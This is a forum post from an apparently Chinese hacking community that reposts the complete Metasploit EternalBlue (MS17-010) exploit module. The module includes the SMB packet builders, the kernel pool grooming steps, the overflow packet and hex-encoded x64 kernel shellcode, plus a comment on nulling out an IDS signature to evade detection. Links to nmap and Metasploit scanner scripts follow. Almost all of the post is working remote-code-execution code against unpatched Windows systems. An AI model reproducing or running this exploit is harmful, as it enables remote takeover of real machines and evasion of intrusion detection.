|
|
|
msf_ms17_010_eternalblue - ##
- # This module requires Metasploit: http://metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- require 'ruby_smb'
- require 'ruby_smb/smb1/packet'
- class MetasploitModule < Msf::Exploit::Remote
- Rank = GreatRanking
- include Msf::Exploit::Remote::Tcp
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'MS17-010 EternalBlue SMB Remote Kernel Pool Corruption',
- 'Description' => %q{
- This module is a port of the Equation Group ETERNALBLUE exploit, part of
- the FuzzBunch toolkit released by Shadow Brokers.
- There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
- is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
- DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
- is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
- completed in srvnet!SrvNetWskReceiveComplete.
- This exploit, like the original may not trigger 100% of the time, and should be
- run continuously until triggered. It seems like the pool will get hot streaks
- and need a cool down period before the shells rain in again.
- },
- 'Author' => [
- 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
- 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
- 'Equation Group',
- 'Shadow Brokers'
- ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'MSB', 'MS17-010' ],
- [ 'CVE', '2017-0143' ],
- [ 'CVE', '2017-0144' ],
- [ 'CVE', '2017-0145' ],
- [ 'CVE', '2017-0146' ],
- [ 'CVE', '2017-0147' ],
- [ 'CVE', '2017-0148' ],
- [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]
- ],
- 'DefaultOptions' =>
- {
- 'EXITFUNC' => 'thread',
- },
- 'Privileged' => true,
- 'Payload' =>
- {
- 'Space' => 2000, # this can be more, needs to be recalculated
- 'EncoderType' => Msf::Encoder::Type::Raw,
- },
- 'Platform' => 'win',
- 'Targets' =>
- [
- [ 'Windows 7 and Server 2008 (x64) All Service Packs',
- {
- 'Platform' => 'win',
- 'Arch' => [ ARCH_X64 ],
- 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
- 'et_alertable' => 0x4c, # ETHREAD.Alertable offset
- 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
- 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
- }
- ],
- ],
- 'DefaultTarget' => 0,
- 'DisclosureDate' => 'Mar 14 2017'
- ))
- register_options(
- [
- Opt::RPORT(445),
- OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),
- OptInt.new( 'MaxExploitAttempts', [ true, "The number of times to retry the exploit.", 3 ] ),
- OptInt.new( 'GroomAllocations', [ true, "Initial number of times to groom the kernel pool.", 12 ] ),
- OptInt.new( 'GroomDelta', [ true, "The amount to increase the groom count by per try.", 5 ] )
- ])
- end
- def check
- # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010
- end
- def exploit
- begin
- for i in 1..datastore['MaxExploitAttempts']
- grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
- smb_eternalblue(datastore['ProcessName'], grooms)
- # we don't need this sleep, and need to find a way to remove it
- # problem is session_count won't increment until stage is complete :\
- sleep 5
- handler
- if self.session_count > 0 # is there a better way?
- print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
- print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
- print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
- break
- else
- print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
- print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
- print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
- end
- end
- rescue ::RubySMB::Error::UnexpectedStatusCode,
- ::Errno::ECONNRESET,
- ::Rex::HostUnreachable,
- ::Rex::ConnectionTimeout,
- ::Rex::ConnectionRefused => e
- print_bad("#{e.class}: #{e.message}")
- rescue => error
- print_bad(error.class)
- print_bad(error.message)
- print_bad(error.backtrace)
- ensure
- # pass
- end
- end
- #
- # Increase the default delay by five seconds since some kernel-mode
- # payloads may not run immediately.
- #
- def wfs_delay
- super + 5
- end
- def smb_eternalblue(process_name, grooms)
- begin
- # Step 0: pre-calculate what we can
- shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)
- payload_hdr_pkt = make_smb2_payload_headers_packet
- payload_body_pkt = make_smb2_payload_body_packet(shellcode)
- # Step 1: Connect to IPC$ share
- print_status("Connecting to target for exploitation.")
- client, tree, sock = smb1_anonymous_connect_ipc()
- print_good("Connection established for exploitation.")
- print_status("Trying exploit with #{grooms} Groom Allocations.")
- # Step 2: Create a large SMB1 buffer
- print_status("Sending all but last fragment of exploit packet")
- smb1_large_buffer(client, tree, sock)
- # Step 3: Groom the pool with payload packets, and open/close SMB1 packets
- print_status("Starting non-paged pool grooming")
- # initialize_groom_threads(ip, port, payload, grooms)
- fhs_sock = smb1_free_hole(true)
- @groom_socks = []
- print_good("Sending SMBv2 buffers")
- smb2_grooms(grooms, payload_hdr_pkt)
- fhf_sock = smb1_free_hole(false)
- print_good("Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.")
- fhs_sock.shutdown()
- print_status("Sending final SMBv2 buffers.") # 6x
- smb2_grooms(6, payload_hdr_pkt) # todo: magic #
- fhf_sock.shutdown()
- print_status("Sending last fragment of exploit packet!")
- final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)
- sock.put(final_exploit_pkt)
- print_status("Receiving response from exploit packet")
- code, raw = smb1_get_response(sock)
- if code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D)
- print_good("ETERNALBLUE overwrite completed successfully (0xC000000D)!")
- end
- # Step 4: Send the payload
- print_status("Sending egg to corrupted connection.")
- @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }
- @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }
- print_status("Triggering free of corrupted buffer.")
- # tree disconnect
- # logoff and x
- # note: these aren't necessary, just close the sockets
- ensure
- abort_sockets
- end
- end
- def smb2_grooms(grooms, payload_hdr_pkt)
- grooms.times do |groom_id|
- gsock = connect(false)
- @groom_socks << gsock
- gsock.put(payload_hdr_pkt)
- end
- end
- def smb1_anonymous_connect_ipc()
- sock = connect(false)
- dispatcher = RubySMB::Dispatcher::Socket.new(sock)
- client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
- client.negotiate
- pkt = make_smb1_anonymous_login_packet
- sock.put(pkt)
- code, raw, response = smb1_get_response(sock)
- unless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS
- raise RubySMB::Error::UnexpectedStatusCode, "Error with anonymous login"
- end
- client.user_id = response.uid
- tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
- return client, tree, sock
- end
- def smb1_large_buffer(client, tree, sock)
- nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)
- # send NT Trans
- vprint_status("Sending NT Trans Request packet")
- sock.put(nt_trans_pkt)
- vprint_status("Receiving NT Trans packet")
- raw = sock.get_once
- # Initial Trans2 request
- trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)
- # send all but last packet
- for i in 1..14
- trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)
- end
- trans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id)
- vprint_status("Sending malformed Trans2 packets")
- sock.put(trans2_pkt_nulled)
- sock.get_once
- end
- def smb1_free_hole(start)
- sock = connect(false)
- dispatcher = RubySMB::Dispatcher::Socket.new(sock)
- client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
- client.negotiate
- pkt = ""
- if start
- vprint_status("Sending start free hole packet.")
- pkt = make_smb1_free_hole_session_packet("\x07\xc0", "\x2d\x01", "\xf0\xff\x00\x00\x00")
- else
- vprint_status("Sending end free hole packet.")
- pkt = make_smb1_free_hole_session_packet("\x07\x40", "\x2c\x01", "\xf8\x87\x00\x00\x00")
- end
- #dump_packet(pkt)
- sock.put(pkt)
- vprint_status("Receiving free hole response.")
- sock.get_once
- return sock
- end
- def smb1_get_response(sock)
- raw = sock.get_once
- response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])
- code = response.nt_status
- return code, raw, response
- end
- def make_smb2_payload_headers_packet
- # don't need a library here, the packet is essentially nonsensical
- pkt = ""
- pkt << "\x00" # session message
- pkt << "\x00\xff\xf7" # size
- pkt << "\xfeSMB" # SMB2
- pkt << "\x00" * 124
- pkt
- end
- def make_smb2_payload_body_packet(kernel_user_payload)
- # precalculated lengths
- pkt_max_len = 4204
- pkt_setup_len = 497
- pkt_max_payload = pkt_max_len - pkt_setup_len # 3575
- # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode
- pkt = ""
- # padding
- pkt << "\x00" * 0x8
- pkt << "\x03\x00\x00\x00"
- pkt << "\x00" * 0x1c
- pkt << "\x03\x00\x00\x00"
- pkt << "\x00" * 0x74
- # KI_USER_SHARED_DATA addresses
- pkt << "\xb0\x00\xd0\xff\xff\xff\xff\xff" * 2 # x64 address
- pkt << "\x00" * 0x10
- pkt << "\xc0\xf0\xdf\xff" * 2 # x86 address
- pkt << "\x00" * 0xc4
- # payload addreses
- pkt << "\x90\xf1\xdf\xff"
- pkt << "\x00" * 0x4
- pkt << "\xf0\xf1\xdf\xff"
- pkt << "\x00" * 0x40
- pkt << "\xf0\x01\xd0\xff\xff\xff\xff\xff"
- pkt << "\x00" * 0x8
- pkt << "\x00\x02\xd0\xff\xff\xff\xff\xff"
- pkt << "\x00"
- pkt << kernel_user_payload
- # fill out the rest, this can be randomly generated
- pkt << "\x00" * (pkt_max_payload - kernel_user_payload.length)
- pkt
- end
- def make_smb1_echo_packet(tree_id, user_id)
- pkt = ""
- pkt << "\x00" # type
- pkt << "\x00\x00\x31" # len = 49
- pkt << "\xffSMB" # SMB1
- pkt << "\x2b" # Echo
- pkt << "\x00\x00\x00\x00" # Success
- pkt << "\x18" # flags
- pkt << "\x07\xc0" # flags2
- pkt << "\x00\x00" # PID High
- pkt << "\x00\x00\x00\x00" # Signature1
- pkt << "\x00\x00\x00\x00" # Signature2
- pkt << "\x00\x00" # Reserved
- pkt << [tree_id].pack("S>") # Tree ID
- pkt << "\xff\xfe" # PID
- pkt << [user_id].pack("S>") # UserID
- pkt << "\x40\x00" # MultiplexIDs
- pkt << "\x01" # Word count
- pkt << "\x01\x00" # Echo count
- pkt << "\x0c\x00" # Byte count
- # echo data
- # this is an existing IDS signature, and can be nulled out
- #pkt << "\x4a\x6c\x4a\x6d\x49\x68\x43\x6c\x42\x73\x72\x00"
- pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00"
- pkt
- end
- # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit
- def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)
- timeout = (timeout * 0x10) + 3
- pkt = ""
- pkt << "\x00" # Session message
- pkt << "\x00\x10\x35" # length
- pkt << "\xffSMB" # SMB1
- pkt << "\x33" # Trans2 request
- pkt << "\x00\x00\x00\x00" # NT SUCCESS
- pkt << "\x18" # Flags
- pkt << "\x07\xc0" # Flags2
- pkt << "\x00\x00" # PID High
- pkt << "\x00\x00\x00\x00" # Signature1
- pkt << "\x00\x00\x00\x00" # Signature2
- pkt << "\x00\x00" # Reserved
- pkt << [tree_id].pack("S>") # TreeID
- pkt << "\xff\xfe" # PID
- pkt << [user_id].pack("S>") # UserID
- pkt << "\x40\x00" # MultiplexIDs
- pkt << "\x09" # Word Count
- pkt << "\x00\x00" # Total Param Count
- pkt << "\x00\x10" # Total Data Count
- pkt << "\x00\x00" # Max Param Count
- pkt << "\x00\x00" # Max Data Count
- pkt << "\x00" # Max Setup Count
- pkt << "\x00" # Reserved
- pkt << "\x00\x10" # Flags
- pkt << "\x35\x00\xd0" # Timeouts
- pkt << timeout.chr
- pkt << "\x00\x00" # Reserved
- pkt << "\x00\x10" # Parameter Count
- #pkt << "\x74\x70" # Parameter Offset
- #pkt << "\x47\x46" # Data Count
- #pkt << "\x45\x6f" # Data Offset
- #pkt << "\x4c" # Setup Count
- #pkt << "\x4f" # Reserved
- if type == :eb_trans2_exploit
- vprint_status("Making :eb_trans2_exploit packet")
- pkt << "\x41" * 2957
- pkt << "\x80\x00\xa8\x00" # overflow
- pkt << "\x00" * 0x10
- pkt << "\xff\xff"
- pkt << "\x00" * 0x6
- pkt << "\xff\xff"
- pkt << "\x00" * 0x16
- pkt << "\x00\xf1\xdf\xff" # x86 addresses
- pkt << "\x00" * 0x8
- pkt << "\x20\xf0\xdf\xff"
- pkt << "\x00\xf1\xdf\xff\xff\xff\xff\xff" # x64
- pkt << "\x60\x00\x04\x10"
- pkt << "\x00" * 4
- pkt << "\x80\xef\xdf\xff"
- pkt << "\x00" * 4
- pkt << "\x10\x00\xd0\xff\xff\xff\xff\xff"
- pkt << "\x18\x01\xd0\xff\xff\xff\xff\xff"
- pkt << "\x00" * 0x10
- pkt << "\x60\x00\x04\x10"
- pkt << "\x00" * 0xc
- pkt << "\x90\xff\xcf\xff\xff\xff\xff\xff"
- pkt << "\x00" * 0x8
- pkt << "\x80\x10"
- pkt << "\x00" * 0xe
- pkt << "\x39"
- pkt << "\xbb"
- pkt << "\x41" * 965
- return pkt
- end
- if type == :eb_trans2_zero
- vprint_status("Making :eb_trans2_zero packet")
- pkt << "\x00" * 2055
- pkt << "\x83\xf3"
- pkt << "\x41" * 2039
- #pkt << "\x00" * 4096
- else
- vprint_status("Making :eb_trans2_buffer packet")
- pkt << "\x41" * 4096
- end
- pkt
- end
- def make_smb1_nt_trans_packet(tree_id, user_id)
- pkt = ""
- pkt << "\x00" # Session message
- pkt << "\x00\x04\x38" # length
- pkt << "\xffSMB" # SMB1
- pkt << "\xa0" # NT Trans
- pkt << "\x00\x00\x00\x00" # NT SUCCESS
- pkt << "\x18" # Flags
- pkt << "\x07\xc0" # Flags2
- pkt << "\x00\x00" # PID High
- pkt << "\x00\x00\x00\x00" # Signature1
- pkt << "\x00\x00\x00\x00" # Signature2
- pkt << "\x00\x00" # Reserved
- pkt << [tree_id].pack("S>") # TreeID
- pkt << "\xff\xfe" # PID
- pkt << [user_id].pack("S>") # UserID
- pkt << "\x40\x00" # MultiplexID
- pkt << "\x14" # Word Count
- pkt << "\x01" # Max Setup Count
- pkt << "\x00\x00" # Reserved
- pkt << "\x1e\x00\x00\x00" # Total Param Count
- pkt << "\xd0\x03\x01\x00" # Total Data Count
- pkt << "\x1e\x00\x00\x00" # Max Param Count
- pkt << "\x00\x00\x00\x00" # Max Data Count
- pkt << "\x1e\x00\x00\x00" # Param Count
- pkt << "\x4b\x00\x00\x00" # Param Offset
- pkt << "\xd0\x03\x00\x00" # Data Count
- pkt << "\x68\x00\x00\x00" # Data Offset
- pkt << "\x01" # Setup Count
- pkt << "\x00\x00" # Function <unknown>
- pkt << "\x00\x00" # Unknown NT transaction (0) setup
- pkt << "\xec\x03" # Byte Count
- pkt << "\x00" * 0x1f # NT Parameters
- # undocumented
- pkt << "\x01"
- pkt << "\x00" * 0x3cd
- pkt
- end
- def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)
- pkt = ""
- pkt << "\x00" # Session message
- pkt << "\x00\x00\x51" # length
- pkt << "\xffSMB" # SMB1
- pkt << "\x73" # Session Setup AndX
- pkt << "\x00\x00\x00\x00" # NT SUCCESS
- pkt << "\x18" # Flags
- pkt << flags2 # Flags2
- pkt << "\x00\x00" # PID High
- pkt << "\x00\x00\x00\x00" # Signature1
- pkt << "\x00\x00\x00\x00" # Signature2
- pkt << "\x00\x00" # Reserved
- pkt << "\x00\x00" # TreeID
- pkt << "\xff\xfe" # PID
- pkt << "\x00\x00" # UserID
- pkt << "\x40\x00" # MultiplexID
- #pkt << "\x00\x00" # Reserved
- pkt << "\x0c" # Word Count
- pkt << "\xff" # No further commands
- pkt << "\x00" # Reserved
- pkt << "\x00\x00" # AndXOffset
- pkt << "\x04\x11" # Max Buffer
- pkt << "\x0a\x00" # Max Mpx Count
- pkt << vcnum # VC Number
- pkt << "\x00\x00\x00\x00" # Session key
- pkt << "\x00\x00" # Security blob length
- pkt << "\x00\x00\x00\x00" # Reserved
- pkt << "\x00\x00\x00\x80" # Capabilities
- pkt << "\x16\x00" # Byte count
- #pkt << "\xf0" # Security Blob: <MISSING>
- #pkt << "\xff\x00\x00\x00" # Native OS
- #pkt << "\x00\x00" # Native LAN manager
- #pkt << "\x00\x00" # Primary domain
- pkt << native_os
- pkt << "\x00" * 17 # Extra byte params
- pkt
- end
- def make_smb1_anonymous_login_packet
- # Neither Rex nor RubySMB appear to support Anon login?
- pkt = ""
- pkt << "\x00" # Session message
- pkt << "\x00\x00\x88" # length
- pkt << "\xffSMB" # SMB1
- pkt << "\x73" # Session Setup AndX
- pkt << "\x00\x00\x00\x00" # NT SUCCESS
- pkt << "\x18" # Flags
- pkt << "\x07\xc0" # Flags2
- pkt << "\x00\x00" # PID High
- pkt << "\x00\x00\x00\x00" # Signature1
- pkt << "\x00\x00\x00\x00" # Signature2
- pkt << "\x00\x00" # TreeID
- pkt << "\xff\xfe" # PID
- pkt << "\x00\x00" # Reserved
- pkt << "\x00\x00" # UserID
- pkt << "\x40\x00" # MultiplexID
- pkt << "\x0d" # Word Count
- pkt << "\xff" # No further commands
- pkt << "\x00" # Reserved
- pkt << "\x88\x00" # AndXOffset
- pkt << "\x04\x11" # Max Buffer
- pkt << "\x0a\x00" # Max Mpx Count
- pkt << "\x00\x00" # VC Number
- pkt << "\x00\x00\x00\x00" # Session key
- pkt << "\x01\x00" # ANSI pw length
- pkt << "\x00\x00" # Unicode pw length
- pkt << "\x00\x00\x00\x00" # Reserved
- pkt << "\xd4\x00\x00\x00" # Capabilities
- pkt << "\x4b\x00" # Byte count
- pkt << "\x00" # ANSI pw
- pkt << "\x00\x00" # Account name
- pkt << "\x00\x00" # Domain name
- # Windows 2000 2195
- pkt << "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
- pkt << "\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00"
- pkt << "\x00\x00"
- # Windows 2000 5.0
- pkt << "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
- pkt << "\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00"
- pkt
- end
- # ring3 = user mode encoded payload
- # proc_name = process to inject APC into
- # ep_thl_b = EPROCESS.ThreadListHead.Blink offset
- # et_alertable = ETHREAD.Alertable offset
- # teb_acp = TEB.ActivationContextPointer offset
- # et_tle = ETHREAD.ThreadListEntry offset
- def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)
- sc = make_kernel_shellcode
- sc << [ring3.length].pack("S<")
- sc << ring3
- sc
- end
- def make_kernel_shellcode
- # https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm
- # Name: kernel
- # Length: 951 bytes
- #"\xcc"+
- "\xB9\x82\x00\x00\xC0\x0F\x32\x48\xBB\xF8\x0F\xD0\xFF\xFF\xFF\xFF" +
- "\xFF\x89\x53\x04\x89\x03\x48\x8D\x05\x0A\x00\x00\x00\x48\x89\xC2" +
- "\x48\xC1\xEA\x20\x0F\x30\xC3\x0F\x01\xF8\x65\x48\x89\x24\x25\x10" +
- "\x00\x00\x00\x65\x48\x8B\x24\x25\xA8\x01\x00\x00\x50\x53\x51\x52" +
- "\x56\x57\x55\x41\x50\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41" +
- "\x56\x41\x57\x6A\x2B\x65\xFF\x34\x25\x10\x00\x00\x00\x41\x53\x6A" +
- "\x33\x51\x4C\x89\xD1\x48\x83\xEC\x08\x55\x48\x81\xEC\x58\x01\x00" +
- "\x00\x48\x8D\xAC\x24\x80\x00\x00\x00\x48\x89\x9D\xC0\x00\x00\x00" +
- "\x48\x89\xBD\xC8\x00\x00\x00\x48\x89\xB5\xD0\x00\x00\x00\x48\xA1" +
- "\xF8\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x48\x89\xC2\x48\xC1\xEA\x20\x48" +
- "\x31\xDB\xFF\xCB\x48\x21\xD8\xB9\x82\x00\x00\xC0\x0F\x30\xFB\xE8" +
- "\x38\x00\x00\x00\xFA\x65\x48\x8B\x24\x25\xA8\x01\x00\x00\x48\x83" +
- "\xEC\x78\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x41\x5B\x41\x5A\x41\x59" +
- "\x41\x58\x5D\x5F\x5E\x5A\x59\x5B\x58\x65\x48\x8B\x24\x25\x10\x00" +
- "\x00\x00\x0F\x01\xF8\xFF\x24\x25\xF8\x0F\xD0\xFF\x56\x41\x57\x41" +
- "\x56\x41\x55\x41\x54\x53\x55\x48\x89\xE5\x66\x83\xE4\xF0\x48\x83" +
- "\xEC\x20\x4C\x8D\x35\xE3\xFF\xFF\xFF\x65\x4C\x8B\x3C\x25\x38\x00" +
- "\x00\x00\x4D\x8B\x7F\x04\x49\xC1\xEF\x0C\x49\xC1\xE7\x0C\x49\x81" +
- "\xEF\x00\x10\x00\x00\x49\x8B\x37\x66\x81\xFE\x4D\x5A\x75\xEF\x41" +
- "\xBC\x20\x04\x00\x00\x31\xDB\x89\xD9\x83\xC1\x04\x81\xF9\x00\x00" +
- "\x01\x00\x0F\x8D\x66\x01\x00\x00\x4C\x89\xF2\x89\xCB\x41\xBB\x66" +
- "\x55\xA2\x4B\xE8\xBC\x01\x00\x00\x85\xC0\x75\xDB\x49\x8B\x0E\x41" +
- "\xBB\xA3\x6F\x72\x2D\xE8\xAA\x01\x00\x00\x48\x89\xC6\xE8\x50\x01" +
- "\x00\x00\x41\x81\xF9\xBF\x77\x1F\xDD\x75\xBC\x49\x8B\x1E\x4D\x8D" +
- "\x6E\x10\x4C\x89\xEA\x48\x89\xD9\x41\xBB\xE5\x24\x11\xDC\xE8\x81" +
- "\x01\x00\x00\x6A\x40\x68\x00\x10\x00\x00\x4D\x8D\x4E\x08\x49\xC7" +
- "\x01\x00\x10\x00\x00\x4D\x31\xC0\x4C\x89\xF2\x31\xC9\x48\x89\x0A" +
- "\x48\xF7\xD1\x41\xBB\x4B\xCA\x0A\xEE\x48\x83\xEC\x20\xE8\x52\x01" +
- "\x00\x00\x85\xC0\x0F\x85\xC8\x00\x00\x00\x49\x8B\x3E\x48\x8D\x35" +
- "\xE9\x00\x00\x00\x31\xC9\x66\x03\x0D\xD7\x01\x00\x00\x66\x81\xC1" +
- "\xF9\x00\xF3\xA4\x48\x89\xDE\x48\x81\xC6\x08\x03\x00\x00\x48\x89" +
- "\xF1\x48\x8B\x11\x4C\x29\xE2\x51\x52\x48\x89\xD1\x48\x83\xEC\x20" +
- "\x41\xBB\x26\x40\x36\x9D\xE8\x09\x01\x00\x00\x48\x83\xC4\x20\x5A" +
- "\x59\x48\x85\xC0\x74\x18\x48\x8B\x80\xC8\x02\x00\x00\x48\x85\xC0" +
- "\x74\x0C\x48\x83\xC2\x4C\x8B\x02\x0F\xBA\xE0\x05\x72\x05\x48\x8B" +
- "\x09\xEB\xBE\x48\x83\xEA\x4C\x49\x89\xD4\x31\xD2\x80\xC2\x90\x31" +
- "\xC9\x41\xBB\x26\xAC\x50\x91\xE8\xC8\x00\x00\x00\x48\x89\xC1\x4C" +
- "\x8D\x89\x80\x00\x00\x00\x41\xC6\x01\xC3\x4C\x89\xE2\x49\x89\xC4" +
- "\x4D\x31\xC0\x41\x50\x6A\x01\x49\x8B\x06\x50\x41\x50\x48\x83\xEC" +
- "\x20\x41\xBB\xAC\xCE\x55\x4B\xE8\x98\x00\x00\x00\x31\xD2\x52\x52" +
- "\x41\x58\x41\x59\x4C\x89\xE1\x41\xBB\x18\x38\x09\x9E\xE8\x82\x00" +
- "\x00\x00\x4C\x89\xE9\x41\xBB\x22\xB7\xB3\x7D\xE8\x74\x00\x00\x00" +
- "\x48\x89\xD9\x41\xBB\x0D\xE2\x4D\x85\xE8\x66\x00\x00\x00\x48\x89" +
- "\xEC\x5D\x5B\x41\x5C\x41\x5D\x41\x5E\x41\x5F\x5E\xC3\xE9\xB5\x00" +
- "\x00\x00\x4D\x31\xC9\x31\xC0\xAC\x41\xC1\xC9\x0D\x3C\x61\x7C\x02" +
- "\x2C\x20\x41\x01\xC1\x38\xE0\x75\xEC\xC3\x31\xD2\x65\x48\x8B\x52" +
- "\x60\x48\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x12\x48\x8B\x72\x50" +
- "\x48\x0F\xB7\x4A\x4A\x45\x31\xC9\x31\xC0\xAC\x3C\x61\x7C\x02\x2C" +
- "\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xEE\x45\x39\xD9\x75\xDA\x4C" +
- "\x8B\x7A\x20\xC3\x4C\x89\xF8\x41\x51\x41\x50\x52\x51\x56\x48\x89" +
- "\xC2\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88\x00\x00\x00\x48\x01\xD0" +
- "\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\x48\xFF\xC9\x41\x8B" +
- "\x34\x88\x48\x01\xD6\xE8\x78\xFF\xFF\xFF\x45\x39\xD9\x75\xEC\x58" +
- "\x44\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C" +
- "\x49\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x5E\x59\x5A\x41\x58\x41" +
- "\x59\x41\x5B\x41\x53\xFF\xE0\x56\x41\x57\x55\x48\x89\xE5\x48\x83" +
- "\xEC\x20\x41\xBB\xDA\x16\xAF\x92\xE8\x4D\xFF\xFF\xFF\x31\xC9\x51" +
- "\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00\x5A\x48\x83\xEC" +
- "\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF\x48\x89\xEC\x5D" +
- "\x41\x5F\x5E\xC3" #\x01\x00\xC3"
- end
- end
nmap-smb-vuln-ms17-010
https://raw.githubusercontent.com/cldrn/nmap-nse-scripts/master/scripts/smb-vuln-ms17-010.nse
msf_smb_ms17_010
https://raw.githubusercontent.com/rapid7/metasploit-framework/942959f7e8b3dee0031726d166002acae115694e/modules/auxiliary/scanner/smb/smb_ms17_010.rb
|
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2017-6-11 19:34:40
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡